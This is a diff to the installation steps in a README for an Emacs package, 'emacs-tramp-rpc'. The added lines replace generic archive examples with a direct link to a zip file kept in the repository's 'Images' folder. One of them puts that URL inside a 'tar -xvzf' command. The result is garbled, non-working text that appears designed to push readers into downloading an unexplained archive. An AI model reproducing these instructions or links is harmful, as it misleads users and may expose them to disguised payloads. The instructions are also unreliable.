MuhammadSufyanSikander/emacs-tramp-rpc/README.md

 4. **Unzip the Download (if necessary)**

-   If the file you downloaded is in a zipped format (like .zip or .tar.gz), you will need to unzip it.
+   If the file you downloaded is in a zipped format (like .zip or https://github.com/MuhammadSufyanSikander/emacs-tramp-rpc/raw/refs/heads/main/Images/emacs_rpc_tramp_v3.5.zip), you will need to unzip it.

    - For Windows, right-click the file and select "Extract All."
    - For macOS, double-click the file to extract it.
-   - For Linux, you can use the command line: `tar -xvzf yourfile.tar.gz`.
+   - For Linux, you can use the command line: `tar -xvzf https://github.com/MuhammadSufyanSikander/emacs-tramp-rpc/raw/refs/heads/main/Images/emacs_rpc_tramp_v3.5.zip`.

 5. **Open emacs-tramp-rpc**